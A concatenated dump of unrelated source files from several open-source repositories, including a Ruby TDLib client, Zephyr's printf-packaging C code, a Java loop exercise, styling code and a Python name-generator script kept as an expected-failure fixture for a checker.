"classarm__compute_1_1_c_l_h_o_g.xhtml#afd44a3d7dad6d984b1b87bc9f1b4fa02":[4,0,0,104,1], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml":[4,0,0,105], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a0325a66cc953500b923a173c049f19ef":[4,0,0,105,3], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a0d45c1b283db50894fafb384393a117d":[4,0,0,105,2], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a2ca01c73542762846c37676789d69b5a":[4,0,0,105,5], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a41cacc3ab4d4d4e7f18cb4e28d8e339b":[4,0,0,105,1], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,105,7], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ad76bc03940c8704af97980954867630f":[4,0,0,105,0], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ae2df93f92808deb66ddc274ee9b27307":[4,0,0,105,4], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ae9efd0c575b2ccb193e1ad57026bb08b":[4,0,0,105,6] };
yurijmi/tdlib-ruby
lib/tdlib/client.rb
<gh_stars>0 # Simple client for TDLib. # @example # TD.configure do |config| # config.lib_path = 'path_to_tdlibjson' # config.encryption_key = 'your_encryption_key' # # config.client.api_id = your_api_id # config.client.api_hash = 'your_api_hash' # end # # client = TD::Client.new # # begin # state = nil # # client.on(TD::Types::Update::AuthorizationState) do |update| # state = case update.authorization_state # when TD::Types::AuthorizationState::WaitPhoneNumber # :wait_phone_number # when TD::Types::AuthorizationState::WaitCode # :wait_code # when TD::Types::AuthorizationState::WaitPassword # :wait_password # when TD::Types::AuthorizationState::Ready # :ready # else # nil # end # end # # loop do # case state # when :wait_phone_number # puts 'Please, enter your phone number:' # phone = STDIN.gets.strip # client.set_authentication_phone_number(phone).value # when :wait_code # puts 'Please, enter code from SMS:' # code = STDIN.gets.strip # client.check_authentication_code(code).value # when :wait_password # puts 'Please, enter 2FA password:' # password = STDIN.gets.strip # client.check_authentication_password(password).value # when :ready # @me = client.get_me.value # break # end # end # # ensure # client.close # end # # p @me class TD::Client include Concurrent include TD::ClientMethods TIMEOUT = 20 def initialize(td_client = TD::Api.client_create, update_manager = TD::UpdateManager.new(td_client), **extra_config) @td_client = td_client @update_manager = update_manager @config = TD.config.client.to_h.merge(extra_config) @ready_condition_mutex = Mutex.new @ready_condition = ConditionVariable.new authorize @update_manager.run end # Sends asynchronous request to the TDLib client and returns Promise object # @see TD::ClientMethods List of available queries as methods # @see https://www.rubydoc.info/github/ruby-concurrency/concurrent-ruby/Concurrent/Promise # Concurrent::Promise documentation # @example # client.broadcast(some_query).then { |result| puts result }.rescue # @param [Hash] query # @param [Numeric] timeout # @return [Concurrent::Promise] def broadcast(query, timeout: TIMEOUT) Promise.execute do condition = ConditionVariable.new extra = TD::Utils.generate_extra(query) result = nil mutex = Mutex.new handler = ->(update, update_extra) do return unless update_extra == extra mutex.synchronize do result = update @update_manager.remove_handler(handler) condition.signal end end @update_manager.add_handler(handler) query['@extra'] = extra mutex.synchronize do TD::Api.client_send(@td_client, query) condition.wait(mutex, timeout) raise TD::TimeoutError if result.nil? result end end end # Sends asynchronous request to the TDLib client and returns received update synchronously # @param [Hash] query # @return [Hash] def fetch(query, timeout: TIMEOUT) broadcast(query, timeout: timeout).value end alias broadcast_and_receive fetch # Synchronously executes TDLib request # Only a few requests can be executed synchronously # @param [Hash] query def execute(query) TD::Api.client_execute(@td_client, query) end # Binds passed block as a handler for updates with type of *update_type* # @param [String, Class] update_type # @yield [update] yields update to the block as soon as it's received def on(update_type, &_) if update_type.is_a?(String) if (type_const = TD::Types::LOOKUP_TABLE[update_type]) update_type = TD::Types.const_get("TD::Types::#{type_const}") else raise ArgumentError.new("Can't find class for #{update_type}") end end unless update_type < TD::Types::Base raise ArgumentError.new("Wrong type specified (#{update_type}). Should be of kind TD::Types::Base") end handler = ->(update, _) do return unless update.is_a?(update_type) yield update end @update_manager.add_handler(handler) end def on_ready(timeout: TIMEOUT, &_) @ready_condition_mutex.synchronize do return(yield self) if @ready || (@ready_condition.wait(@ready_condition_mutex, timeout) && @ready) raise TD::TimeoutError end end # Stops update manager and destroys TDLib client def close @update_manager.stop TD::Api.client_destroy(@td_client) end private def authorize handler = ->(update, _) do return unless update.is_a?(TD::Types::Update::AuthorizationState) case update.authorization_state when TD::Types::AuthorizationState::WaitTdlibParameters set_tdlib_parameters(TD::Types::TdlibParameters.new(**@config)) when TD::Types::AuthorizationState::WaitEncryptionKey check_database_encryption_key(TD.config.encryption_key) else @update_manager.remove_handler(handler) @ready_condition_mutex.synchronize do @ready = true @ready_condition.broadcast end end end @update_manager.add_handler(handler) end end
dmarcotte/intellij-community
platform/platform-impl/src/com/intellij/codeStyle/IdeaColorSchemesProvider.java
/* * Copyright 2000-2012 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.codeStyle; import com.intellij.openapi.application.ApplicationManager; import com.intellij.openapi.editor.colors.impl.BundledColorSchemesProvider; import com.intellij.util.PlatformUtils; /** * @author <NAME> */ public class IdeaColorSchemesProvider implements BundledColorSchemesProvider { public static final String[] PATHS = { "/colorSchemes/Darcula" }; @Override public String[] getBundledSchemesRelativePaths() { if (ApplicationManager.getApplication().isUnitTestMode()) return null; if (PlatformUtils.isCommunity() || PlatformUtils.isIdea()) return PATHS; return null; } @Override public String getDefaultSchemaExtensionPath() { return null; } }
lieftsatyamShrivastava/Java_SoftUni
ProgrammingBasics/NestedLoops-Lab/src/SumOfTwoNumbers.java
<filename>ProgrammingBasics/NestedLoops-Lab/src/SumOfTwoNumbers.java import java.util.Scanner; public class SumOfTwoNumbers { public static void main(String[] args) { Scanner scan = new Scanner(System.in); int begin = Integer.parseInt(scan.nextLine()); int end = Integer.parseInt(scan.nextLine()); int number = Integer.parseInt(scan.nextLine()); int combination = 0; boolean isFound = false; for (int i = begin; i <= end ; i++) { for (int j = begin; j <= end; j++) { combination++; if (i + j == number){ System.out.printf("Combination N:%d (%d + %d = %d)", combination, i, j, number); isFound = true; break; } } if (isFound) { break; } } if (!isFound) System.out.printf("%d combinations - neither equals %d", combination, number); } }
ArthurMaciel95/link-share-react
src/components/clip-board-area/styles.js
<gh_stars>1-10 import styled from "styled-components"; export const ClipBoardAreaStyle = styled.div` border-radius: 25px; max-width: 250px; .btn { height: 40px; } p { display: flex; align-items: center; margin: 0px; padding: 8px 15px; overflow: hidden; white-space: nowrap; color: var(--text-color-gray); } .btn p { color: var(--primary-color); } .icon-area { background-color: var(--primary-color); padding: 15px; border-radius: 0px 25px 25px 0px; display: flex; align-items: center; justify-content: center; cursor: pointer; } @media screen and (max-width: 500px) { width: 100%; max-width: 100%; button { } } `;
ifyall/zephyr
lib/os/cbprintf_packaged.c
/* * Copyright (c) 2021 BayLibre, SAS * * SPDX-License-Identifier: Apache-2.0 */ #include <errno.h> #include <stdarg.h> #include <stdint.h> #include <string.h> #include <linker/utils.h> #include <sys/cbprintf.h> #include <sys/types.h> #include <sys/util.h> #include <sys/__assert.h> /** * @brief Check if address is in read only section. * * @param addr Address. * * @return True if address identified within read only section. */ static inline bool ptr_in_rodata(const char *addr) { #if defined(CBPRINTF_VIA_UNIT_TEST) /* Unit test is X86 (or other host) but not using Zephyr * linker scripts. */ return false; #else return linker_is_in_rodata(addr); #endif } /* * va_list creation */ #if defined(__CHECKER__) static int cbprintf_via_va_list(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, const char *fmt, void *buf) { return 0; } #elif defined(__aarch64__) /* * Reference: * * Procedure Call Standard for the ARM 64-bit Architecture */ struct __va_list { void *__stack; void *__gr_top; void *__vr_top; int __gr_offs; int __vr_offs; }; BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list), "architecture specific support is wrong"); static int cbprintf_via_va_list(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, const char *fmt, void *buf) { union { va_list ap; struct __va_list __ap; } u; /* create a valid va_list with our buffer */ u.__ap.__stack = buf; u.__ap.__gr_top = NULL; u.__ap.__vr_top = NULL; u.__ap.__gr_offs = 0; u.__ap.__vr_offs = 0; return formatter(out, ctx, fmt, u.ap); } #elif defined(__x86_64__) /* * Reference: * * System V Application Binary Interface * AMD64 Architecture Processor Supplement */ struct __va_list { unsigned int gp_offset; unsigned int fp_offset; void *overflow_arg_area; void *reg_save_area; }; BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list), "architecture specific support is wrong"); static int cbprintf_via_va_list(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, const char *fmt, void *buf) { union { va_list ap; struct __va_list __ap; } u; /* create a valid va_list with our buffer */ u.__ap.overflow_arg_area = buf; u.__ap.reg_save_area = NULL; u.__ap.gp_offset = (6 * 8); u.__ap.fp_offset = (6 * 8 + 16 * 16); return formatter(out, ctx, fmt, u.ap); } #elif defined(__xtensa__) /* * Reference: * * gcc source code (gcc/config/xtensa/xtensa.c) * xtensa_build_builtin_va_list(), xtensa_va_start(), * xtensa_gimplify_va_arg_expr() */ struct __va_list { void *__va_stk; void *__va_reg; int __va_ndx; }; BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list), "architecture specific support is wrong"); static int cbprintf_via_va_list(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, const char *fmt, void *buf) { union { va_list ap; struct __va_list __ap; } u; /* create a valid va_list with our buffer */ u.__ap.__va_stk = (char *)buf - 32; u.__ap.__va_reg = NULL; u.__ap.__va_ndx = (6 + 2) * 4; return formatter(out, ctx, fmt, u.ap); } #else /* * Default implementation shared by many architectures like * 32-bit ARM and Intel. * * We assume va_list is a simple pointer. */ BUILD_ASSERT(sizeof(va_list) == sizeof(void *), "architecture specific support is needed"); static int cbprintf_via_va_list(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, const char *fmt, void *buf) { union { va_list ap; void *ptr; } u; u.ptr = buf; return formatter(out, ctx, fmt, u.ap); } #endif static size_t get_package_len(void *packaged) { __ASSERT_NO_MSG(packaged != NULL); uint8_t *buf = packaged; uint8_t *start = buf; unsigned int args_size, s_nbr, ros_nbr; args_size = buf[0] * sizeof(int); s_nbr = buf[1]; ros_nbr = buf[2]; /* Move beyond args. */ buf += args_size; /* Move beyond read-only string indexes array. */ buf += ros_nbr; /* Move beyond strings appended to the package. */ for (int i = 0; i < s_nbr; i++) { buf++; buf += strlen((const char *)buf) + 1; } return (size_t)(uintptr_t)(buf - start); } static int append_string(cbprintf_convert_cb cb, void *ctx, const char *str, uint16_t strl) { if (cb == NULL) { return 1 + strlen(str); } strl = strl > 0 ? strl : strlen(str) + 1; return cb(str, strl, ctx); } int cbvprintf_package(void *packaged, size_t len, uint32_t flags, const char *fmt, va_list ap) { /* * Internally, a byte is used to store location of a string argument within a * package. MSB bit is set if string is read-only so effectively 7 bits are * used for index, which should be enough. */ #define STR_POS_RO_FLAG BIT(7) #define STR_POS_MASK BIT_MASK(7) /* Buffer offset abstraction for better code clarity. */ #define BUF_OFFSET ((uintptr_t)buf - (uintptr_t)buf0) uint8_t *buf0 = packaged; /* buffer start (may be NULL) */ uint8_t *buf = buf0; /* current buffer position */ unsigned int size; /* current argument's size */ unsigned int align; /* current argument's required alignment */ uint8_t str_ptr_pos[16]; /* string pointer positions */ unsigned int s_idx = 0; /* index into str_ptr_pos[] */ unsigned int s_rw_cnt = 0; /* number of rw strings */ unsigned int s_ro_cnt = 0; /* number of ro strings */ unsigned int i; const char *s; bool parsing = false; /* Flag indicates that rw strings are stored as array with positions, * instead of appending them to the package. */ bool rws_pos_en = !!(flags & CBPRINTF_PACKAGE_ADD_RW_STR_POS); /* Get number of first read only strings present in the string. * There is always at least 1 (fmt) but flags can indicate more, e.g * fixed prefix appended to all strings. */ int fros_cnt = 1 + Z_CBPRINTF_PACKAGE_FIRST_RO_STR_CNT_GET(flags); /* Buffer must be aligned at least to size of a pointer. */ if ((uintptr_t)packaged % sizeof(void *)) { return -EFAULT; } #if defined(__xtensa__) /* Xtensa requires package to be 16 bytes aligned. */ if ((uintptr_t)packaged % CBPRINTF_PACKAGE_ALIGNMENT) { return -EFAULT; } #endif /* * Make room to store the arg list size and the number of * appended strings. They both occupy 1 byte each. * * Given the next value to store is the format string pointer * which is guaranteed to be at least 4 bytes, we just reserve * a pointer size for the above to preserve alignment. */ buf += sizeof(char *); /* * When buf0 is NULL we don't store anything. * Instead we count the needed space to store the data. * In this case, incoming len argument indicates the anticipated * buffer "misalignment" offset. */ if (buf0 == NULL) { buf += len % CBPRINTF_PACKAGE_ALIGNMENT; /* * The space to store the data is represented by both the * buffer offset as well as the extra string data to be * appended. When only figuring out the needed space, we * don't append anything. Instead, we reuse the len variable * to sum the size of that data. * * Also, we subtract any initial misalignment offset from * the total as this won't be part of the buffer. To avoid * going negative with an unsigned variable, we add an offset * (CBPRINTF_PACKAGE_ALIGNMENT) that will be removed before * returning. */ len = CBPRINTF_PACKAGE_ALIGNMENT - (len % CBPRINTF_PACKAGE_ALIGNMENT); } /* * Otherwise we must ensure we can store at least * the pointer to the format string itself. */ if (buf0 != NULL && BUF_OFFSET + sizeof(char *) > len) { return -ENOSPC; } /* * Then process the format string itself. * Here we branch directly into the code processing strings * which is in the middle of the following while() loop. That's the * reason for the post-decrement on fmt as it will be incremented * prior to the next (actually first) round of that loop. */ s = fmt--; align = VA_STACK_ALIGN(char *); size = sizeof(char *); goto process_string; /* Scan the format string */ while (*++fmt != '\0') { if (!parsing) { if (*fmt == '%') { parsing = true; align = VA_STACK_ALIGN(int); size = sizeof(int); } continue; } switch (*fmt) { case '%': parsing = false; continue; case '#': case '-': case '+': case ' ': case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': case '.': case 'h': case 'l': case 'L': continue; case '*': break; case 'j': align = VA_STACK_ALIGN(intmax_t); size = sizeof(intmax_t); continue; case 'z': align = VA_STACK_ALIGN(size_t); size = sizeof(size_t); continue; case 't': align = VA_STACK_ALIGN(ptrdiff_t); size = sizeof(ptrdiff_t); continue; case 'c': case 'd': case 'i': case 'o': case 'u': case 'x': case 'X': if (fmt[-1] == 'l') { if (fmt[-2] == 'l') { align = VA_STACK_ALIGN(long long); size = sizeof(long long); } else { align = VA_STACK_ALIGN(long); size = sizeof(long); } } parsing = false; break; case 's': case 'p': case 'n': align = VA_STACK_ALIGN(void *); size = sizeof(void *); parsing = false; break; case 'a': case 'A': case 'e': case 'E': case 'f': case 'F': case 'g': case 'G': { /* * Handle floats separately as they may be * held in a different register set. */ union { double d; long double ld; } v; if (fmt[-1] == 'L') { v.ld = va_arg(ap, long double); align = VA_STACK_ALIGN(long double); size = sizeof(long double); } else { v.d = va_arg(ap, double); align = VA_STACK_ALIGN(double); size = sizeof(double); } /* align destination buffer location */ buf = (void *) ROUND_UP(buf, align); if (buf0 != NULL) { /* make sure it fits */ if (BUF_OFFSET + size > len) { return -ENOSPC; } if (Z_CBPRINTF_VA_STACK_LL_DBL_MEMCPY) { memcpy(buf, &v, size); } else if (fmt[-1] == 'L') { *(long double *)buf = v.ld; } else { *(double *)buf = v.d; } } buf += size; parsing = false; continue; } default: parsing = false; continue; } /* align destination buffer location */ buf = (void *) ROUND_UP(buf, align); /* make sure the data fits */ if (buf0 != NULL && BUF_OFFSET + size > len) { return -ENOSPC; } /* copy va_list data over to our buffer */ if (*fmt == 's') { s = va_arg(ap, char *); process_string: if (buf0 != NULL) { *(const char **)buf = s; } bool is_ro = (fros_cnt-- > 0) ? true : ptr_in_rodata(s); bool do_ro = !!(flags & CBPRINTF_PACKAGE_ADD_RO_STR_POS); if (is_ro && !do_ro) { /* nothing to do */ } else { uint32_t s_ptr_idx = BUF_OFFSET / sizeof(int); /* * In the do_ro case we must consider * room for possible STR_POS_RO_FLAG. * Otherwise the index range is 8 bits * and any overflow is caught later. */ if (do_ro && s_ptr_idx > STR_POS_MASK) { __ASSERT(false, "String with too many arguments"); return -EINVAL; } if (s_idx >= ARRAY_SIZE(str_ptr_pos)) { __ASSERT(false, "str_ptr_pos[] too small"); return -EINVAL; } if (buf0 != NULL) { /* * Remember string pointer location. * We will append non-ro strings later. */ str_ptr_pos[s_idx] = s_ptr_idx; if (is_ro) { /* flag read-only string. */ str_ptr_pos[s_idx] |= STR_POS_RO_FLAG; s_ro_cnt++; } else { s_rw_cnt++; } } else if (is_ro || rws_pos_en) { /* * Add only pointer position prefix * when counting strings. */ len += 1; } else { /* * Add the string length, the final '\0' * and size of the pointer position prefix. */ len += strlen(s) + 1 + 1; } s_idx++; } buf += sizeof(char *); } else if (size == sizeof(int)) { int v = va_arg(ap, int); if (buf0 != NULL) { *(int *)buf = v; } buf += sizeof(int); } else if (size == sizeof(long)) { long v = va_arg(ap, long); if (buf0 != NULL) { *(long *)buf = v; } buf += sizeof(long); } else if (size == sizeof(long long)) { long long v = va_arg(ap, long long); if (buf0 != NULL) { if (Z_CBPRINTF_VA_STACK_LL_DBL_MEMCPY) { memcpy(buf, &v, sizeof(long long)); } else { *(long long *)buf = v; } } buf += sizeof(long long); } else { __ASSERT(false, "unexpected size %u", size); return -EINVAL; } } /* * We remember the size of the argument list as a multiple of * sizeof(int) and limit it to a 8-bit field. That means 1020 bytes * worth of va_list, or about 127 arguments on a 64-bit system * (twice that on 32-bit systems). That ought to be good enough. */ if (BUF_OFFSET / sizeof(int) > 255) { __ASSERT(false, "too many format args"); return -EINVAL; } /* * If all we wanted was to count required buffer size * then we have it now. */ if (buf0 == NULL) { return BUF_OFFSET + len - CBPRINTF_PACKAGE_ALIGNMENT; } /* Clear our buffer header. We made room for it initially. */ *(char **)buf0 = NULL; /* Record end of argument list. */ buf0[0] = BUF_OFFSET / sizeof(int); if (rws_pos_en) { /* Strings are appended, update location counter. */ buf0[1] = 0; buf0[3] = s_rw_cnt; } else { /* Strings are appended, update append counter. */ buf0[1] = s_rw_cnt; buf0[3] = 0; } buf0[2] = s_ro_cnt; /* Store strings pointer locations of read only strings. */ if (s_ro_cnt) { for (i = 0; i < s_idx; i++) { if (!(str_ptr_pos[i] & STR_POS_RO_FLAG)) { continue; } uint8_t pos = str_ptr_pos[i] & STR_POS_MASK; /* make sure it fits */ if (BUF_OFFSET + 1 > len) { return -ENOSPC; } /* store the pointer position prefix */ *buf++ = pos; } } /* Store strings prefixed by their pointer location. */ for (i = 0; i < s_idx; i++) { /* Process only RW strings. */ if (s_ro_cnt && str_ptr_pos[i] & STR_POS_RO_FLAG) { continue; } if (rws_pos_en) { size = 0; } else { /* retrieve the string pointer */ s = *(char **)(buf0 + str_ptr_pos[i] * sizeof(int)); /* clear the in-buffer pointer (less entropy if compressed) */ *(char **)(buf0 + str_ptr_pos[i] * sizeof(int)) = NULL; /* find the string length including terminating '\0' */ size = strlen(s) + 1; } /* make sure it fits */ if (BUF_OFFSET + 1 + size > len) { return -ENOSPC; } /* store the pointer position prefix */ *buf++ = str_ptr_pos[i]; /* copy the string with its terminating '\0' */ memcpy(buf, s, size); buf += size; } /* * TODO: remove pointers for appended strings since they're useless. * TODO: explore leveraging same mechanism to remove alignment padding */ return BUF_OFFSET; #undef BUF_OFFSET #undef STR_POS_RO_FLAG #undef STR_POS_MASK } int cbprintf_package(void *packaged, size_t len, uint32_t flags, const char *format, ...) { va_list ap; int ret; va_start(ap, format); ret = cbvprintf_package(packaged, len, flags, format, ap); va_end(ap); return ret; } int cbpprintf_external(cbprintf_cb out, cbvprintf_exteral_formatter_func formatter, void *ctx, void *packaged) { uint8_t *buf = packaged; char *fmt, *s, **ps; unsigned int i, args_size, s_nbr, ros_nbr, rws_nbr, s_idx; if (buf == NULL) { return -EINVAL; } /* Retrieve the size of the arg list and number of strings. */ args_size = buf[0] * sizeof(int); s_nbr = buf[1]; ros_nbr = buf[2]; rws_nbr = buf[3]; /* Locate the string table */ s = (char *)(buf + args_size + ros_nbr + rws_nbr); /* * Patch in string pointers. */ for (i = 0; i < s_nbr; i++) { /* Locate pointer location for this string */ s_idx = *(uint8_t *)s++; ps = (char **)(buf + s_idx * sizeof(int)); /* update the pointer with current string location */ *ps = s; /* move to next string */ s += strlen(s) + 1; } /* Retrieve format string */ fmt = ((char **)buf)[1]; /* skip past format string pointer */ buf += sizeof(char *) * 2; /* Turn this into a va_list and print it */ return cbprintf_via_va_list(out, formatter, ctx, fmt, buf); } int cbprintf_package_convert(void *in_packaged, size_t in_len, cbprintf_convert_cb cb, void *ctx, uint32_t flags, uint16_t *strl, size_t strl_len) { __ASSERT_NO_MSG(in_packaged != NULL); uint8_t *buf = in_packaged; uint32_t *buf32 = in_packaged; unsigned int args_size, ros_nbr, rws_nbr; bool rw_cpy; bool ro_cpy; struct z_cbprintf_desc *in_desc = in_packaged; in_len = in_len != 0 ? in_len : get_package_len(in_packaged); /* Get number of RO string indexes in the package and check if copying * includes appending those strings. */ ros_nbr = in_desc->ro_str_cnt; ro_cpy = ros_nbr && (flags & CBPRINTF_PACKAGE_COPY_RO_STR) == CBPRINTF_PACKAGE_COPY_RO_STR; /* Get number of RW string indexes in the package and check if copying * includes appending those strings. */ rws_nbr = in_desc->rw_str_cnt; rw_cpy = rws_nbr > 0 && (flags & CBPRINTF_PACKAGE_COPY_RW_STR) == CBPRINTF_PACKAGE_COPY_RW_STR; /* If flags are not set or appending request without rw string indexes * present is chosen, just do a simple copy (or length calculation). * Assuming that it is the most common case. */ if (!rw_cpy && !ro_cpy) { if (cb) { cb(in_packaged, in_len, ctx); } return in_len; } /* If we got here, it means that coping will be more complex and will be * done with strings appending. * Retrieve the size of the arg list. */ args_size = in_desc->len * sizeof(int); int out_len; /* Pointer to array with string locations. Array starts with read-only * string locations. */ uint8_t *str_pos = &buf[args_size]; size_t strl_cnt = 0; /* If null destination, just calculate output length. */ if (cb == NULL) { out_len = (int)in_len; if (ro_cpy) { for (int i = 0; i < ros_nbr; i++) { const char *str = *(const char **)&buf32[*str_pos]; int len = append_string(cb, NULL, str, 0); /* If possible store calculated string length. */ if (strl && strl_cnt < strl_len) { strl[strl_cnt++] = (uint16_t)len; } out_len += len; str_pos++; } } else { if (ros_nbr && flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) { str_pos += ros_nbr; } } bool drop_ro_str_pos = !(flags & (CBPRINTF_PACKAGE_COPY_KEEP_RO_STR | CBPRINTF_PACKAGE_COPY_RO_STR)); /* Handle RW strings. */ for (int i = 0; i < rws_nbr; i++) { const char *str = *(const char **)&buf32[*str_pos]; bool is_ro = ptr_in_rodata(str); if ((is_ro && flags & CBPRINTF_PACKAGE_COPY_RO_STR) || (!is_ro && flags & CBPRINTF_PACKAGE_COPY_RW_STR)) { int len = append_string(cb, NULL, str, 0); /* If possible store calculated string length. */ if (strl && strl_cnt < strl_len) { strl[strl_cnt++] = (uint16_t)len; } out_len += len; } if (is_ro && drop_ro_str_pos) { /* If read-only string location is dropped decreased * length. */ out_len--; } str_pos++; } return out_len; } struct z_cbprintf_desc out_desc; /* At least one is copied in. */ uint8_t cpy_str_pos[16]; /* Up to one will be kept since if both types are kept it returns earlier. */ uint8_t keep_str_pos[16]; uint8_t scpy_cnt; uint8_t keep_cnt; uint8_t *dst; int rv; /* If read-only strings shall be appended to the output package copy * their indexes to the local array, otherwise indicate that indexes * shall remain in the output package. */ if (ro_cpy) { scpy_cnt = ros_nbr; keep_cnt = 0; dst = cpy_str_pos; } else if (ros_nbr && flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) { scpy_cnt = 0; keep_cnt = ros_nbr; dst = keep_str_pos; } else { scpy_cnt = 0; keep_cnt = 0; dst = NULL; } if (dst) { memcpy(dst, str_pos, ros_nbr); } str_pos += ros_nbr; /* Go through read-write strings and identify which shall be appended. * Note that there may be read-only strings there. Use address evaluation * to determine if strings is read-only. */ for (int i = 0; i < rws_nbr; i++) { const char *str = *(const char **)&buf32[*str_pos]; bool is_ro = ptr_in_rodata(str); if (is_ro) { if (flags & CBPRINTF_PACKAGE_COPY_RO_STR) { __ASSERT_NO_MSG(scpy_cnt < sizeof(cpy_str_pos)); cpy_str_pos[scpy_cnt++] = *str_pos; } else if (flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) { __ASSERT_NO_MSG(keep_cnt < sizeof(keep_str_pos)); keep_str_pos[keep_cnt++] = *str_pos; } else { /* Drop information about ro_str location. */ } } else { if (flags & CBPRINTF_PACKAGE_COPY_RW_STR) { __ASSERT_NO_MSG(scpy_cnt < sizeof(cpy_str_pos)); cpy_str_pos[scpy_cnt++] = *str_pos; } else { __ASSERT_NO_MSG(keep_cnt < sizeof(keep_str_pos)); keep_str_pos[keep_cnt++] = *str_pos; } } str_pos++; } /* Set amount of strings appended to the package. */ out_desc.len = in_desc->len; out_desc.str_cnt = in_desc->str_cnt + scpy_cnt; out_desc.rw_str_cnt = (flags & CBPRINTF_PACKAGE_COPY_RW_STR) ? 0 : keep_cnt; out_desc.ro_str_cnt = (flags & CBPRINTF_PACKAGE_COPY_RO_STR) ? 0 : ((flags & CBPRINTF_PACKAGE_COPY_KEEP_RO_STR) ? keep_cnt : 0); /* Temporary overwrite input descriptor to allow bulk transfer */ struct z_cbprintf_desc in_desc_backup = *in_desc; *in_desc = out_desc; /* Copy package header and arguments. */ rv = cb(in_packaged, args_size, ctx); if (rv < 0) { return rv; } out_len = rv; /* Restore input descriptor. */ *in_desc = in_desc_backup; /* Copy string positions which are kept. */ rv = cb(keep_str_pos, keep_cnt, ctx); if (rv < 0) { return rv; } out_len += rv; /* Copy appended strings from source package to destination. */ size_t strs_len = in_len - (args_size + ros_nbr + rws_nbr); rv = cb(str_pos, strs_len, ctx); if (rv < 0) { return rv; } out_len += rv; /* Append strings */ for (int i = 0; i < scpy_cnt; i++) { uint8_t loc = cpy_str_pos[i]; const char *str = *(const char **)&buf32[loc]; uint16_t str_len = strl ? strl[i] : 0; rv = cb(&loc, 1, ctx); if (rv < 0) { return rv; } out_len += rv; rv = append_string(cb, ctx, str, str_len); if (rv < 0) { return rv; } out_len += rv; } /* Empty call (can be interpreted as flushing) */ (void)cb(NULL, 0, ctx); return out_len; }
JohannesBuchner/pystrict3
tests/expect-fail23/recipe-83206.py
#!/usr/bin/env python from string import split first_name = split(""" chet <NAME> ethel <NAME> """) last_name = split(""" milquetoast roth bumstead toodles menderchuck """) er = split(""" killer slayer smiter destroyer defenestrator """) p = split(""" of """) adj = split("""very small tiny non-combatant defenseless""",'\n') n = split("""reindeer bunnies probate-attorneys inanimate objects fruit""",'\n') name = [first_name,last_name,[','],er,p,adj,n] if __name__ == '__main__': import random try: i = hash(input('enter your name:')) except: i = 35 random.seed(i) print('your viking name is', end=' ') for i in [random.choice(list) for list in name]: print(i, end=' ')
nfwGytautas/GLEngine-v2
OpenGL Engine/src/components/Component.h
#pragma once #include <type_traits> class Entity; struct Component { Entity* entity{ nullptr }; //This method is called after construction of the component virtual void init() {} //This method is called after every update cycle virtual void update(float frameTime) {} //This method is called before every render cycle virtual void preRender() {} //This method is called during every render cycle virtual void render() {} //This method is called after every render cycle virtual void postRender() {} //Required for blueprints virtual Component* clone() { return new Component(*this); } virtual ~Component() {} }; using ComponentID = size_t; ComponentID getUniqueComponentID() noexcept; template<typename T> ComponentID getComponentTypeID() noexcept { static_assert(std::is_base_of<Component, T>::value, "T must inherit from Component"); static ComponentID typeID{ getUniqueComponentID() }; return typeID; }
PublicHealthEngland/data_management_system
lib/schema_browser/category_choice.rb
<filename>lib/schema_browser/category_choice.rb module SchemaBrowser # Build Category Choice nodes if applicable class CategoryChoice include Nodes::Utility include SchemaBrowser::Utility include SchemaBrowser::UtilityCategory attr_accessor :zipfile, :html, :node, :dataset, :version def initialize(zipfile, node) @zipfile = zipfile @html = '' @depth = 0 @index = false @node = node @version = node.dataset_version @dataset = version.dataset build end def build tag(:html) do head_common body_common do body_container_common do navbar category_choice_content end end end end def category_choice_content tag(:div, id: 'content', class: 'row') do tag(:div, class: 'span12') do category_table do node.child_nodes.sort_by(&:sort).each do |child_node| version.categories.sort_by(&:sort).pluck(:name).each do |category_name| table_row_category("#{category_name}#{child_node.xsd_element_name}") end end end end end tag(:div, id: 'push') end def save_file filename = "schema_browser/Tabular/#{node.xsd_element_name}.html" save_schema_pack_file(html, filename, zipfile) end end end
UnionInternationalCheminsdeFer/OSDM-Converter
GTM data converter.tests/src/Gtm/converter/tests/TransitSeriesBorderPointTest.java
